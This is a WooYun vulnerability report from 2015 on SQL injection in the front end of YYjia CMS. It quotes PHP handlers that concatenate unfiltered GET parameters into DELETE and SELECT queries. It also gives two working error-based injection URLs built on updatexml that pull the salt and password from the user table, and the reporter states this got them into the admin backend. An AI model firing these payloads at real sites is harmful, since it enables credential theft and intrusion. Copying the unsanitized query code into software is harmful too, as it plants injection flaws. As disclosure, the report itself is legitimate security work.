当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094583

漏洞标题:YYjia cms前台过滤不严,导致注入#2

相关厂商:yyjia.com

漏洞作者: webos

提交时间:2015-02-04 10:58

修复时间:2015-05-08 09:42

公开时间:2015-05-08 09:42

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-04: 细节已通知厂商并且等待厂商处理中
2015-02-07: 厂商已经确认,细节仅向厂商公开
2015-02-10: 细节向第三方安全合作伙伴开放
2015-04-03: 细节向核心白帽子及相关领域专家公开
2015-04-13: 细节向普通白帽子公开
2015-04-23: 细节向实习白帽子公开
2015-05-08: 细节向公众公开

简要描述:

YYjia cms前台过滤不严,导致注入#2

详细说明:

又看了看这个文件,发现还有漏洞:

elseif($caozuo=="delapp"){
$uploadid=$_GET['id'];
$lx=$_GET[lx];
$sql="delete from user_data where zxid='".$uploadid."' and type='2'";
$_SGLOBAL['db']->query($sql);
$sql="select * from ".tname('appinfo')." where id=$uploadid";
$appinfo=$_SGLOBAL['db']->fetch_array($_SGLOBAL['db']->query($sql));
$logofile=S_ROOT.$appinfo['logo'];
if($logofile){
unlink($logofile);
}
if($appinfo[type]==2){
$dsql="select imgurl from androidinfo where appid='".$uploadid."'";
}elseif($appinfo[type]==1){
$dsql="select imgurl from appleinfo where appid='".$uploadid."'";
}elseif($appinfo[type]==3){
$dsql="select imgurl from wpinfo where appid='".$uploadid."'";
}
$dquery=$_SGLOBAL['db']->query($dsql);
$andrvalue=$_SGLOBAL['db']->fetch_array($dquery);
$filepics=explode("@@@",$andrvalue[imgurl]);
foreach($filepics as $dkey=>$dval){
$dval=substr($dval,19);
$filepic=S_ROOT.$dval;
if($filepic){
unlink($filepic);
}
}
$sql1="delete from appinfo where id=".$uploadid;
$_SGLOBAL['db']->query($sql1);
if($lx=="1"){
$sql2="delete from appleinfo where appid=".$uploadid;
$_SGLOBAL['db']->query($sql2);
}elseif($lx=='2'){
$sql3="delete from androidinfo where appid=".$uploadid;
$_SGLOBAL['db']->query($sql3);
}elseif($lx=='3'){
$sql4="delete from wpinfo where appid=".$uploadid;
$_SGLOBAL['db']->query($sql4);
}
showmessage("成功删除记录","index.php?ac=user&op=myapps");
}

白花花的一片几乎全是没有过滤的

http://192.168.218.13:805//index.php?ac=user&caozuo=delapp&id=-1%20and%20updatexml(1,concat(0x17,(select%20salt%20from%20`user`+limit+0,1)),0)%23


1.jpg


2.jpg


进到后台了:

3.jpg


还有一处:

if($caozuo){
if($caozuo=="delcom"){
$commentid=$_GET['commentid'];
if($commentid){
$sql="delete from user_data where uid='".$uid."' and type='4' and zxid=".$commentid;
}else{
$sql="delete from user_data where uid='".$uid."' and type='4'";
}
$aa=$_SGLOBAL['db']->query($sql);
showmessage("记录删除成功",$_SERVER['HTTP_REFERER']);

}


访问:

/index.php?ac=user&caozuo=delcom&commentid=-1%20and%20updatexml(1,concat(0x17,(select%20password%20from%20`user`+limit+0,1)),0)%23


4.jpg


5.jpg


(45app就是yyjia的演示站了)
:)
你再不修,我还有大招放

漏洞证明:

修复方案:

版权声明:转载请注明来源 webos@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-07 09:41

厂商回复:

修复中

最新状态:

暂无